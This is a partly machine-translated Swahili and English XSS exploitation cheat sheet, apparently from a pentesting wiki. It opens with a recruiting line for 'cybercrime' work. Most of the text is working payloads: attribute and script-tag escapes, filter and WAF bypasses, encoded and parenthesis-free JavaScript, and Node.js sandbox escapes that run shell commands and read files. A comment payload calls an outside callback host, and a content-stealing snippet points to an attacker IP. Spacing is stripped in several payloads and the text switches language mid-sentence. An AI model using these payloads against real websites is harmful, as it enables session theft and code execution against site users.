Ikiwa unavutiwa na kazi ya uhalifu wa mtandao na kujaribu kuvunja yasiyoweza kuvunjwa - tunatafuta wafanyakazi! (kuandika na kuzungumza kwa ufasaha Kiswahili kunahitajika).
Ili kufanikiwa kutumia XSS jambo la kwanza unahitaji kupata ni thamani inayodhibitiwa na wewe inayorudi kwenye ukurasa wa wavuti.
Inarudi kwa kati: Ikiwa unapata kwamba thamani ya parameta au hata njia inarudi kwenye ukurasa wa wavuti unaweza kutumia Reflected XSS.
Ilihifadhiwa na kurudi: Ikiwa unapata kwamba thamani inayodhibitiwa na wewe imehifadhiwa kwenye seva na inarudi kila wakati unapoingia kwenye ukurasa unaweza kutumia Stored XSS.
Inafikiwa kupitia JS: Ikiwa unapata kwamba thamani inayodhibitiwa na wewe inafikiwa kwa kutumia JS unaweza kutumia DOM XSS.
Contexts
Unapojaribu kutumia XSS jambo la kwanza unahitaji kujua ni wapi ingizo lako linaporudi. Kulingana na muktadha, utaweza kutekeleza JS code bila mipaka kwa njia tofauti.
Raw HTML
Ikiwa ingizo lako linarudi kwenye HTML safi ukurasa utahitaji kutumia baadhi ya HTML tag ili kutekeleza JS code: <img , <iframe , <svg , <script ... hizi ni baadhi tu ya vitambulisho vingi vya HTML ambavyo unaweza kutumia.
Pia, kumbuka Client Side Template Injection.
Ndani ya sifa za vitambulisho vya HTML
Ikiwa ingizo lako linarudi ndani ya thamani ya sifa ya tag unaweza kujaribu:
Kutoroka kutoka kwenye sifa na kutoka kwenye tag (kisha utakuwa kwenye HTML safi) na kuunda vitambulisho vipya vya HTML ili kutumia: "><img [...]
Ikiwa unaweza kutoroka kutoka kwenye sifa lakini si kutoka kwenye tag (> imeandikwa au kufutwa), kulingana na tag unaweza kuunda tukio linalotekeleza JS code: " autofocus onfocus=alert(1) x="
Ikiwa huwezi kutoroka kutoka kwenye sifa (" inandikwa au kufutwa), kisha kulingana na sifa ipi thamani yako inarudi ndani ikiwa unadhibiti thamani yote au sehemu tu utaweza kuitumia. Kwa mfano, ikiwa unadhibiti tukio kama onclick= utaweza kufanya itekeleze code bila mipaka wakati inabonyezwa. Mfano mwingine wa kuvutia ni sifa href, ambapo unaweza kutumia itifaki ya javascript: kutekeleza code bila mipaka: href="javascript:alert(1)"
Ikiwa ingizo lako linarudi ndani ya "vitambulisho visivyoweza kutumika" unaweza kujaribu hila ya accesskey kutumia udhaifu (utahitaji aina fulani ya uhandisi wa kijamii ili kutumia hii): " accesskey="x" onclick="alert(1)" x="
Mfano wa ajabu wa Angular ikitekeleza XSS ikiwa unadhibiti jina la darasa:
Katika kesi hii, ingizo lako linarejelewa kati ya <script> [...] </script> lebo za ukurasa wa HTML, ndani ya faili ya .js au ndani ya sifa kwa kutumia javascript: itifaki:
Ikiwa inarejelewa kati ya <script> [...] </script> lebo, hata kama ingizo lako liko ndani ya aina yoyote ya nukuu, unaweza kujaribu kuingiza </script> na kutoroka kutoka kwenye muktadha huu. Hii inafanya kazi kwa sababu ** kivinjari kitaanza kuchambua lebo za HTML** na kisha yaliyomo, kwa hivyo, hakitagundua kwamba lebo yako ya kuingiza </script> iko ndani ya msimbo wa HTML.
Ikiwa inarejelewa ndani ya mfuatano wa JS na hila ya mwisho haifanyi kazi, unahitaji kutoka kwenye mfuatano, kutekeleza msimbo wako na kurekebisha msimbo wa JS (ikiwa kuna kosa lolote, halitatekelezwa):
'-alert(1)-'
';-alert(1)//
\';alert(1)//
Ikiwa inarejelewa ndani ya maandiko ya kigezo unaweza kuingiza maelekezo ya JS kwa kutumia sintaksia ya ${ ... }: var greetings = `Hello, ${alert(1)}`
Unicode encode inafanya kazi kuandika msimbo sahihi wa javascript:
\u{61}lert(1)\u0061lert(1)\u{0061}lert(1)
Javascript Hoisting
Javascript Hoisting inahusisha fursa ya kutangaza kazi, mabadiliko au madarasa baada ya kutumika ili uweze kutumia hali ambapo XSS inatumia mabadiliko au kazi zisizotangazwa.Angalia ukurasa ufuatao kwa maelezo zaidi:
Kurasa kadhaa za wavuti zina mwisho ambao zinakubali kama parameter jina la kazi ya kutekeleza. Mfano wa kawaida wa kuona katika mazingira halisi ni kitu kama: ?callback=callbackFunc.
Njia nzuri ya kugundua ikiwa kitu kilichotolewa moja kwa moja na mtumiaji kinajaribu kutekelezwa ni kubadilisha thamani ya param (kwa mfano kuwa 'Vulnerable') na kutazama kwenye console kwa makosa kama:
Ikiwa ni hatari, unaweza kuwa na uwezo wa kuanzisha tahadhari kwa kutuma tu thamani: ?callback=alert(1). Hata hivyo, ni kawaida sana kwamba mwisho huu uta thibitisha maudhui ili kuruhusu herufi, nambari, nukta na viwango vya chini tu ([\w\._]).
Hata hivyo, hata na kikomo hicho bado inawezekana kufanya baadhi ya vitendo. Hii ni kwa sababu unaweza kutumia herufi hizo halali ili kufikia kipengee chochote katika DOM:
You can also try to trigger Javascript functions directly: obj.sales.delOrders.
However, usually the endpoints executing the indicated function are endpoints without much interesting DOM, other pages in the same origin will have a more interesting DOM to perform more actions.
Therefore, in order to abuse this vulnerability in a different DOM the Same Origin Method Execution (SOME) exploitation was developed:
There is JS code that is using unsafely some data controlled by an attacker like location.href. An attacker, could abuse this to execute arbitrary JS code.
These kind of XSS can be found anywhere. They not depend just on the client exploitation of a web application but on anycontext. These kind of arbitrary JavaScript execution can even be abuse to obtain RCE, readarbitraryfiles in clients and servers, and more.
Some examples:
When your input is reflected inside the HTML page or you can escape and inject HTML code in this context the first thing you need to do if check if you can abuse < to create new tags: Just try to reflect that char and check if it's being HTML encoded or deleted of if it is reflected without changes. Only in the last case you will be able to exploit this case.
For this cases also keep in mindClient Side Template Injection.Note: A HTML comment can be closed using******** --> or ****--!>
In this case and if no black/whitelisting is used, you could use payloads like:
But, if tags/attributes black/whitelisting is being used, you will need to brute-force which tags you can create.
Once you have located which tags are allowed, you would need to brute-force attributes/events inside the found valid tags to see how you can attack the context.
Tags/Events brute-force
Go to https://portswigger.net/web-security/cross-site-scripting/cheat-sheet and click on Copy tags to clipboard. Then, send all of them using Burp intruder and check if any tags wasn't discovered as malicious by the WAF. Once you have discovered which tags you can use, you can brute force all the events using the valid tags (in the same web page click on Copy events to clipboard and follow the same procedure as before).
Custom tags
If you didn't find any valid HTML tag, you could try to create a custom tag and and execute JS code with the onfocus attribute. In the XSS request, you need to end the URL with # to make the page focus on that object and execute the code:
Ikiwa aina fulani ya blacklist inatumika unaweza kujaribu kuipita kwa hila za kipumbavu:
//Random capitalization<script> --> <ScrIpT><img --> <ImG//Double tag, in case just the first match is removed<script><script><scr<script>ipt><SCRscriptIPT>alert(1)</SCRscriptIPT>//You can substitude the space to separate attributes for://*%00//%00*/%2F%0D%0C%0A%09//Unexpected parent tags<svg><x><script>alert('1')</x>//Unexpected weird attributes<script x><scripta="1234"><script ~~~><script/random>alert(1)</script><script ///Note the newline>alert(1)</script><scr\x00ipt>alert(1)</scr\x00ipt>//Not closing tag, ending with " <" or " //"<iframeSRC="javascript:alert('XSS');" <<iframe SRC="javascript:alert('XSS');"////Extra open<<script>alert("XSS");//<</script>//Just weird an unexpected, use your imagination<</script/script><script><input type=image srconerror="prompt(1)">//Using `` instead of parenthesisonerror=alert`1`//Use more than one<<TexTArEa/*%00//%00*/a="not"/*%00///AutOFocUs////onFoCUS=alert`1` //
<!-- Taken from the blog of Jorge Lajara --><svg/onload=alert``><scriptsrc=//aa.es><scriptsrc=//℡㏛.pw>
The last one is using 2 unicode characters which expands to 5: telsr
More of these characters can be found here.
To check in which characters are decomposed check here.
Click XSS - Clickjacking
Ikiwa ili kutumia udhaifu unahitaji mtumiaji kubonyeza kiungo au fomu yenye data iliyojazwa awali unaweza kujaribu kudhulumu Clickjacking (ikiwa ukurasa una udhaifu).
Impossible - Dangling Markup
Ikiwa unafikiri tu kwamba haiwezekani kuunda tag ya HTML yenye sifa ya kutekeleza msimbo wa JS, unapaswa kuangalia Danglig Markup kwa sababu unaweza kutumia udhaifu bila kutekeleza JS msimbo.
Injecting inside HTML tag
Inside the tag/escaping from attribute value
Ikiwa uko ndani ya tag ya HTML, jambo la kwanza unaloweza kujaribu ni kutoroka kutoka kwa tag na kutumia baadhi ya mbinu zilizotajwa katika sehemu ya awali kutekeleza msimbo wa JS.
Ikiwa huwezi kutoroka kutoka kwa tag, unaweza kuunda sifa mpya ndani ya tag kujaribu kutekeleza msimbo wa JS, kwa mfano kutumia payload kama (kumbuka kwamba katika mfano huu nukuu mbili zinatumika kutoroka kutoka kwa sifa, hutahitaji hizo ikiwa ingizo lako linarejelewa moja kwa moja ndani ya tag):
<p style="animation: x;" onanimationstart="alert()">XSS</p><p style="animation: x;" onanimationend="alert()">XSS</p>#ayload that injects an invisible overlay that will trigger a payload if anywhere on the page is clicked:<div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.5);z-index: 5000;" onclick="alert(1)"></div>
#moving your mouse anywhere over the page (0-click-ish):<div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.0);z-index: 5000;" onmouseover="alert(1)"></div>
Ndani ya sifa
Hata kama huwezi kutoroka kutoka kwenye sifa (" inakodishwa au kufutwa), kulingana na sifa ipi thamani yako inarudishwa ndani kama unadhibiti thamani yote au sehemu tu utaweza kuitumia vibaya. Kwa mfano, ikiwa unadhibiti tukio kama onclick= utaweza kufanya itekeleze msimbo wowote unapobofya.
Mfano mwingine wa kuvutia ni sifa href, ambapo unaweza kutumia itifaki javascript: kutekeleza msimbo wowote: href="javascript:alert(1)"
Kupita ndani ya tukio kwa kutumia HTML encoding/URL encode
Makarakteri yaliyokodishwa ya HTML ndani ya thamani ya sifa za vitambulisho vya HTML yanatolewa wakati wa kutekeleza. Hivyo basi kitu kama ifuatavyo kitakuwa halali (mzigo uko kwa maandiko makubwa): <a id="author" href="http://none" onclick="var tracker='http://foo?'-alert(1)-'';">Rudi Nyuma </a>
Kumbuka kwamba aina yoyote ya HTML encode ni halali:
//HTML entities'-alert(1)-'//HTML hex without zeros'-alert(1)-'//HTML hex with zeros'-alert(1)-'//HTML dec without zeros'-alert(1)-'//HTML dec with zeros'-alert(1)-'<ahref="javascript:var a=''-alert(1)-''">a</a><ahref="javascript:alert(2)">a</a><ahref="javascript:alert(3)">a</a>
//For some reason you can use unicode to encode "alert" but not "(1)"<imgsrconerror=\u0061\u006C\u0065\u0072\u0074(1) /><imgsrconerror=\u{61}\u{6C}\u{65}\u{72}\u{74}(1) />
Mipango Maalum Ndani ya sifa
Hapa unaweza kutumia mipango javascript: au data: katika baadhi ya maeneo ili kutekeleza msimbo wa JS wa kiholela. Baadhi zitahitaji mwingiliano wa mtumiaji na zingine hazitahitaji.
javascript:alert(1)JavaSCript:alert(1)javascript:%61%6c%65%72%74%28%31%29//URL encodejavascript:alert(1)javascript:alert(1)javascript:alert(1)javascriptΪlert(1)java //Note the new linescript:alert(1)data:text/html,<script>alert(1)</script>DaTa:text/html,<script>alert(1)</script>data:text/html;charset=iso-8859-7,%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3edata:text/html;charset=UTF-8,<script>alert(1)</script>data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=data:text/html;charset=thing;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pgdata:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==
Mahali ambapo unaweza kuingiza protokali hizi
Kwa ujumla protokali ya javascript: inaweza kutumika katika lebo yoyote inayokubali sifa ya href na katika zaidi ya lebo nyingi zinazokubali sifa ya src (lakini si <img>)
Zaidi ya hayo, kuna njia nzuri nyingine kwa kesi hizi: Hata kama ingizo lako ndani ya javascript:... linapewa URL encoding, litakuwa URL decoded kabla ya kutekelezwa. Hivyo, ikiwa unahitaji kutoroka kutoka kwa nyuzi kwa kutumia nukta moja na unaona kwamba linapewa URL encoding, kumbuka kwamba haijalishi, litakuwa limefasiriwa kama nukta moja wakati wa wakati wa utekelezaji.
Kumbuka kwamba ikiwa utajaribu kutumia zoteURLencode + HTMLencode kwa mpangilio wowote ili kuandika payload haitafanya kazi, lakini unaweza kuziunganisha ndani ya payload.
Kutumia Hex na Octal encode na javascript:
Unaweza kutumia Hex na Octal encode ndani ya sifa ya src ya iframe (angalau) kutangaza HTML tags za kutekeleza JS:
//Encoded: <svg onload=alert(1)>// This WORKS<iframesrc=javascript:'\x3c\x73\x76\x67\x20\x6f\x6e\x6c\x6f\x61\x64\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x3e' /><iframesrc=javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76' />//Encoded: alert(1)// This doesn't work<svgonload=javascript:'\x61\x6c\x65\x72\x74\x28\x31\x29' /><svgonload=javascript:'\141\154\145\162\164\50\61\51' />
Reverse tab nabbing
<atarget="_blank"rel="opener"
Ikiwa unaweza kuingiza URL yoyote katika tag ya <a href= isiyo na mipaka ambayo ina sifa za target="_blank" and rel="opener", angalia ukurasa ufuatao ili kutumia tabia hii:
<!-- Injection inside meta attribute--><metaname="apple-mobile-web-app-title"content=""Twitterpopoverid="newsletter"onbeforetoggle=alert(2) /><!-- Existing target--><buttonpopovertarget="newsletter">Subscribe to newsletter</button><divpopoverid="newsletter">Newsletter popup</div>
From here: Unaweza kutekeleza XSS payload ndani ya sifa iliyofichwa, ikiwa unaweza kushawishimhasiriwa kubonyeza mchanganyiko wa funguo. Kwenye Firefox Windows/Linux mchanganyiko wa funguo ni ALT+SHIFT+X na kwenye OS X ni CTRL+ALT+X. Unaweza kubaini mchanganyiko tofauti wa funguo kwa kutumia funguo tofauti katika sifa ya ufikiaji. Hapa kuna vector:
Ikiwa umepata XSS katika sehemu ndogo sana ya wavuti inayohitaji aina fulani ya mwingiliano (labda kiungo kidogo kwenye footer chenye kipengele cha onmouseover), unaweza kujaribu kubadilisha nafasi ambayo kipengele hicho kinachukua ili kuongeza uwezekano wa kiungo hicho kufanyika.
Katika kesi hizi ingizo lako litakuwa limeakisiwa ndani ya msimbo wa JS wa faili ya .js au kati ya vitambulisho vya <script>...</script> au kati ya matukio ya HTML ambayo yanaweza kutekeleza msimbo wa JS au kati ya sifa zinazokubali itifaki ya javascript:.
Kutoroka <script> tag
Ikiwa msimbo wako umeingizwa ndani ya <script> [...] var input = 'data iliyoakisiwa' [...] </script> unaweza kwa urahisi kutoroka kufunga <script> tag:
Note that in this example we haven't even closed the single quote. This is because HTML parsing is performed first by the browser, which involves identifying page elements, including blocks of script. The parsing of JavaScript to understand and execute the embedded scripts is only carried out afterward.
Inside JS code
If <> are being sanitised you can still escape the string where your input is being located and execute arbitrary JS. It's important to fix JS syntax, because if there are any errors, the JS code won't be executed:
Ili kujenga nyuzi mbali na nukta moja na mbili, JS pia inakubali backticks``. Hii inajulikana kama template literals kwani inaruhusu kuingiza maelezo ya JS kwa kutumia sintaksia ${ ... }.
Hivyo, ikiwa unapata kuwa ingizo lako linatolewa ndani ya nyuzi ya JS inayotumia backticks, unaweza kutumia sintaksia ${ ... } kutekeleza kodhi ya JS isiyo na mipaka:
Hii inaweza kutumiwa vibaya kwa kutumia:
`${alert(1)}``${`${`${`${alert(1)}`}`}`}`
// This is valid JS code, because each time the function returns itself it's recalled with ``functionloop(){return loop}loop``````````````
Utekelezaji wa msimbo uliohifadhiwa
<script>\u0061lert(1)</script>
<svg><script>alert('1')
<svg><script>alert(1)</script></svg> <!-- The svg tags are neccesary
<iframe srcdoc="<SCRIPT>alert(1)</iframe>">
Unicode Encode JS execution
\u{61}lert(1)\u0061lert(1)\u{0061}lert(1)
Mbinu za kupita orodha za mblacklist za JavaScript
'\b'//backspace'\f'//form feed'\n'//new line'\r'//carriage return'\t'//tab'\b'//backspace'\f'//form feed'\n'//new line'\r'//carriage return'\t'//tab// Any other char escaped is just itself
//This is a 1 line comment/* This is a multiline comment*/<!--This is a 1line comment#!This is a 1 line comment, but "#!" must to be at the beggining of the first line-->This is a 1 line comment, but "-->" must to be at the beggining of the first line
//Javascript interpret as new line these chars:String.fromCharCode(10); alert('//\nalert(1)') //0x0aString.fromCharCode(13); alert('//\ralert(1)') //0x0dString.fromCharCode(8232); alert('//\u2028alert(1)') //0xe2 0x80 0xa8String.fromCharCode(8233); alert('//\u2029alert(1)') //0xe2 0x80 0xa9
JavaScript nafasi za wazi
log=[];functionfunct(){}for(let i=0;i<=0x10ffff;i++){try{eval(`funct${String.fromCodePoint(i)}()`);log.push(i);}catch(e){}}console.log(log)//9,10,11,12,13,32,160,5760,8192,8193,8194,8195,8196,8197,8198,8199,8200,8201,8202,8232,8233,8239,8287,12288,65279//Either the raw characters can be used or you can HTML encode them if they appear in SVG or HTML attributes:<img/src/onerror=alert(1)>
Javascript ndani ya maoni
//If you can only inject inside a JS comment, you can still leak something//If the user opens DevTools request to the indicated sourceMappingURL will be send//# sourceMappingURL=https://evdr12qyinbtbd29yju31993gumlaby0.oastify.com
JavaScript bila mabano
// By setting locationwindow.location='javascript:alert\x281\x29'x=new DOMMatrix;matrix=alert;x.a=1337;location='javascript'+':'+x// or any DOMXSS sink such as location=name// Backtips// Backtips pass the string as an array of lenght 1alert`1`// Backtips + Tagged Templates + call/applyeval`alert\x281\x29`// This won't work as it will just return the passed arraysetTimeout`alert\x281\x29`eval.call`${'alert\x281\x29'}`eval.apply`${[`alert\x281\x29`]}`[].sort.call`${alert}1337`[].map.call`${eval}\\u{61}lert\x281337\x29`// To pass several arguments you can usefunctionbtt(){console.log(arguments);}btt`${'arg1'}${'arg2'}${'arg3'}`//It's possible to construct a function and call itFunction`x${'alert(1337)'}x```// .replace can use regexes and call a function if something is found"a,".replace`a${alert}`//Initial ["a"] is passed to str as "a," and thats why the initial string is "a,""a".replace.call`1${/./}${alert}`// This happened in the previous example// Change "this" value of call to "1,"// match anything with regex /./// call alert with "1""a".replace.call`1337${/..../}${alert}`//alert with 1337 instead// Using Reflect.apply to call any function with any argumnetsReflect.apply.call`${alert}${window}${[1337]}` //Pass the function to call (“alert”), then the “this” value to that function (“window”) which avoids the illegal invocation error and finally an array of arguments to pass to the function.
Reflect.apply.call`${navigation.navigate}${navigation}${[name]}`// Using Reflect.set to call set any value to a variableReflect.set.call`${location}${'href'}${'javascript:alert\x281337\x29'}` // It requires a valid object in the first argument (“location”), a property in the second argument and a value to assign in the third.
// valueOf, toString// These operations are called when the object is used as a primitive// Because the objet is passed as "this" and alert() needs "window" to be the value of "this", "window" methods are used
valueOf=alert;window+''toString=alert;window+''// Error handlerwindow.onerror=eval;throw"=alert\x281\x29";onerror=eval;throw"=alert\x281\x29";<imgsrc=x onerror="window.onerror=eval;throw'=alert\x281\x29'">{onerror=eval}throw"=alert(1)" //No ";"onerror=alert //No ";" using new linethrow 1337// Error handler + Special unicode separatorseval("onerror=\u2028alert\u2029throw 1337");// Error handler + Comma separator// The comma separator goes through the list and returns only the last elementvar a = (1,2,3,4,5,6) // a = 6throw onerror=alert,1337 // this is throw 1337, after setting the onerror event to alertthrow onerror=alert,1,1,1,1,1,1337// optional exception variables inside a catch clause.try{throw onerror=alert}catch{throw 1}// Has instance symbol'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}// The “has instance” symbol allows you to customise the behaviour of the instanceof operator, if you set this symbol it will pass the left operand to the function defined by the symbol.
//Eval like functionseval('ale'+'rt(1)')setTimeout('ale'+'rt(2)');setInterval('ale'+'rt(10)');Function('ale'+'rt(10)')``;[].constructor.constructor("alert(document.domain)")``[]["constructor"]["constructor"]`$${alert()}```import('data:text/javascript,alert(1)')//General function executions``//Can be use as parenthesisalert`document.cookie`alert(document['cookie'])with(document)alert(cookie)(alert)(1)(alert(1))in"."a=alert,a(1)[1].find(alert)window['alert'](0)parent['alert'](1)self['alert'](2)top['alert'](3)this['alert'](4)frames['alert'](5)content['alert'](6)[7].map(alert)[8].find(alert)[9].every(alert)[10].filter(alert)[11].findIndex(alert)[12].forEach(alert);top[/al/.source+/ert/.source](1)top[8680439..toString(30)](1)Function("ale"+"rt(1)")();newFunction`al\ert\`6\``;Set.constructor('ale'+'rt(13)')();Set.constructor`al\x65rt\x2814\x29```;$='e'; x='ev'+'al'; x=this[x]; y='al'+$+'rt(1)'; y=x(y); x(y)x='ev'+'al'; x=this[x]; y='ale'+'rt(1)'; x(x(y))this[[]+('eva')+(/x/,new Array)+'l'](/xxx.xxx.xxx.xxx.xx/+alert(1),new Array)globalThis[`al`+/ert/.source]`1`this[`al`+/ert/.source]`1`[alert][0].call(this,1)window['a'+'l'+'e'+'r'+'t']()window['a'+'l'+'e'+'r'+'t'].call(this,1)top['a'+'l'+'e'+'r'+'t'].apply(this,[1])(1,2,3,4,5,6,7,8,alert)(1)x=alert,x(1)[1].find(alert)top["al"+"ert"](1)top[/al/.source+/ert/.source](1)al\u0065rt(1)al\u0065rt`1`top['al\145rt'](1)top['al\x65rt'](1)top[8680439..toString(30)](1)<svg><animateonbegin=alert() attributeName=x></svg>
Vikosi vya DOM
Kuna kodiyaki ya JS inayotumia data isiyo salama inayodhibitiwa na mshambuliaji kama location.href. Mshambuliaji anaweza kutumia hii kutekeleza kodiyaki ya JS isiyo na mipaka.
Kwa sababu ya upanuzi wa maelezo yavikosi vya DOM, imehamishwa kwenye ukurasa huu:
Hapa utapata maelezo ya kina kuhusu vikosi vya DOM, jinsi vinavyosababishwa, na jinsi ya kuvifanyia kazi.
Pia, usisahau kwamba mwishoni mwa chapisho lililotajwa unaweza kupata maelezo kuhusu shambulio la DOM Clobbering.
Kuboresha Self-XSS
Cookie XSS
Ikiwa unaweza kuanzisha XSS kwa kutuma mzigo ndani ya cookie, hii kwa kawaida ni self-XSS. Hata hivyo, ikiwa utapata subdomain iliyo hatarini kwa XSS, unaweza kutumia XSS hii kuingiza cookie katika kikoa chote na kufanikisha kuanzisha cookie XSS katika kikoa kikuu au subdomains zingine (zinazohatarini kwa cookie XSS). Kwa hili unaweza kutumia shambulio la cookie tossing:
Labda mtumiaji anaweza kushiriki profaili yake na msimamizi na ikiwa self XSS iko ndani ya profaili ya mtumiaji na msimamizi anapofikia, atachochea udhaifu huo.
Kurefusha Kikao
Ikiwa utapata self XSS na ukurasa wa wavuti una kurefusha kikao kwa wasimamizi, kwa mfano kuruhusu wateja kuomba msaada na ili msimamizi akusaidie atakuwa akiona kile unachokiona katika kikao chako lakini kutoka kikao chake.
Unaweza kuangalia ikiwa thamani zilizorejelewa zinakuwa sawasawa za unicode katika seva (au upande wa mteja) na kutumia kazi hii kupita ulinzi. Pata mfano hapa.
PHP FILTER_VALIDATE_EMAIL flag Bypass
"><svg/onload=confirm(1)>"@x.y
Ruby-On-Rails bypass
Kwa sababu ya RoR mass assignment nukuu zinaingizwa kwenye HTML na kisha kikomo cha nukuu kinapita na maeneo ya ziada (onfocus) yanaweza kuongezwa ndani ya tag.
Mfano wa fomu (kutoka ripoti hii), ikiwa utatuma payload:
Ikiwa unapata kwamba unaweza kuingiza vichwa katika jibu la 302 Redirect unaweza kujaribu kufanya kivinjari kifanye JavaScript isiyo na mipaka. Hii si rahisi kwani vivinjari vya kisasa havitafsiri mwili wa jibu la HTTP ikiwa msimamo wa jibu la HTTP ni 302, hivyo payload ya cross-site scripting pekee haitakuwa na manufaa.
Katika ripoti hii na hii moja unaweza kusoma jinsi unavyoweza kujaribu protokali kadhaa ndani ya kichwa cha Location na kuona ikiwa yoyote kati yao inaruhusu kivinjari kuchunguza na kutekeleza payload ya XSS ndani ya mwili.
Protokali zilizojulikana zamani: mailto://, //x:1/, ws://, wss://, kichwa cha Location kisicho na kitu, resource://.
Herufi, Nambari na Nukta Pekee
Ikiwa unaweza kuonyesha callback ambayo javascript itakuwa inayo tekeleza ikipunguzwa kwa herufi hizo. Soma sehemu hii ya chapisho hili ili kujua jinsi ya kutumia tabia hii vibaya.
Aina za Maudhui Halali za <script> kwa XSS
(Kutoka hapa) Ikiwa unajaribu kupakia script yenye aina ya maudhui kama application/octet-stream, Chrome itatupa kosa lifuatalo:
Refused to execute script from ‘https://uploader.c.hc.lc/uploads/xxx' because its MIME type (‘application/octet-stream’) is not executable, and strict MIME type checking is enabled.
(Kutoka hapa) Hivyo, ni aina gani zinaweza kuashiria kupakia skripti?
<scripttype="???"></script>
module (default, hakuna cha kuelezea)
webbundle: Web Bundles ni kipengele ambacho unaweza kufunga kundi la data (HTML, CSS, JS…) pamoja katika faili .wbn.
<scripttype="webbundle">{"source": "https://example.com/dir/subresources.wbn","resources": ["https://example.com/dir/a.js", "https://example.com/dir/b.js", "https://example.com/dir/c.png"]}</script>The resources are loaded from the source .wbn, not accessed via HTTP
importmap: Inaruhusu kuboresha sintaksia ya kuagiza
<scripttype="importmap">{"imports": {"moment": "/node_modules/moment/src/moment.js","lodash": "/node_modules/lodash-es/lodash.js"}}</script><!-- With importmap you can do the following --><script>import moment from"moment";import { partition } from"lodash";</script>
Hali hii ilitumika katika hii ripoti kubadilisha maktaba ili eval kuweza kuibua XSS.
speculationrules: Kipengele hiki hasa kinakusudia kutatua baadhi ya matatizo yanayosababishwa na pre-rendering. Kifanyikavyo ni hivi:
Ikiwa ukurasa unarudisha aina ya maudhui ya text/xml inawezekana kuashiria namespace na kutekeleza JS isiyo na mipaka:
<xml><text>hello<imgsrc="1"onerror="alert(1)"xmlns="http://www.w3.org/1999/xhtml" /></text></xml><!-- Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (p. 113). Kindle Edition. -->
Mifumo Maalum ya Kubadilisha
Wakati kitu kama "some {{template}} data".replace("{{template}}", <user_input>) kinatumika. Mshambuliaji anaweza kutumia mabadiliko maalum ya nyuzi kujaribu kupita baadhi ya ulinzi: "123 {{template}} 456".replace("{{template}}", JSON.stringify({"name": "$'$`alert(1)//"}))
Kwa mfano katika hii andiko, hii ilitumika ku kutoa nyuzi za JSON ndani ya script na kutekeleza msimbo wa kiholela.
Ikiwa una seti ndogo tu ya wahusika kutumia, angalia hizi suluhisho nyingine halali za matatizo ya XSJail:
// eval + unescape + regexeval(unescape(/%2f%0athis%2econstructor%2econstructor(%22return(process%2emainModule%2erequire(%27fs%27)%2ereadFileSync(%27flag%2etxt%27,%27utf8%27))%22)%2f/))()
eval(unescape(1+/1,this%2evalueOf%2econstructor(%22process%2emainModule%2erequire(%27repl%27)%2estart()%22)()%2f/))// use of withwith(console)log(123)with(/console.log(1)/)with(this)with(constructor)constructor(source)()// Just replace console.log(1) to the real code, the code we want to run is://return String(process.mainModule.require('fs').readFileSync('flag.txt'))with(process)with(mainModule)with(require('fs'))return(String(readFileSync('flag.txt')))with(k='fs',n='flag.txt',process)with(mainModule)with(require(k))return(String(readFileSync(n)))with(String)with(f=fromCharCode,k=f(102,115),n=f(102,108,97,103,46,116,120,116),process)with(mainModule)with(require(k))return(String(readFileSync(n)))
//Final solutionwith(/with(String)with(f=fromCharCode,k=f(102,115),n=f(102,108,97,103,46,116,120,116),process)with(mainModule)with(require(k))return(String(readFileSync(n)))/)with(this)with(constructor)constructor(source)()// For more uses of with go to challenge misc/CaaSio PSE in// https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#misc/CaaSio%20PSE
Ikiwa kila kitu hakijafafanuliwa kabla ya kutekeleza msimbo usioaminika (kama ilivyo katika hii ripoti) inawezekana kuunda vitu vya manufaa "kutoka kwa chochote" ili kutumia utekelezaji wa msimbo usioaminika wa kiholela:
Kutumia import()
// although import "fs" doesn’t work, import('fs') does.import("fs").then(m=>console.log(m.readFileSync("/flag.txt","utf8")))
Kupata require kwa njia isiyo ya moja kwa moja
Kulingana na hii moduli zimefungwa na Node.js ndani ya kazi, kama hii:
Kwa hivyo, ikiwa kutoka kwenye moduli hiyo tunaweza kuita kazi nyingine, inawezekana kutumia arguments.callee.caller.arguments[1] kutoka kwa kazi hiyo kufikia require:
Kwa njia sawa na mfano uliopita, inawezekana kutumia waandishi wa makosa kufikia wrapper ya moduli na kupata require kazi:
try {
null.f()
} catch (e) {
TypeError = e.constructor
}
Object = {}.constructor
String = ''.constructor
Error = TypeError.prototype.__proto__.constructor
function CustomError() {
const oldStackTrace = Error.prepareStackTrace
try {
Error.prepareStackTrace = (err, structuredStackTrace) => structuredStackTrace
Error.captureStackTrace(this)
this.stack
} finally {
Error.prepareStackTrace = oldStackTrace
}
}
function trigger() {
const err = new CustomError()
console.log(err.stack[0])
for (const x of err.stack) {
// use x.getFunction() to get the upper function, which is the one that Node.js adds a wrapper to, and then use arugments to get the parameter
const fn = x.getFunction()
console.log(String(fn).slice(0, 200))
console.log(fn?.arguments)
console.log('='.repeat(40))
if ((args = fn?.arguments)?.length > 0) {
req = args[1]
console.log(req('child_process').execSync('id').toString())
}
}
}
trigger()
Hutaweza kufikia vidakuzi kutoka JavaScript ikiwa bendera ya HTTPOnly imewekwa kwenye kidakuzi. Lakini hapa una njia kadhaa za kupita ulinzi huu ikiwa umebahatika.
Pora Maudhui ya Ukurasa
var url = "http://10.10.10.25:8000/vac/a1fbf2d1-7c3f-48d2-b0c3-a205e54e09e8";
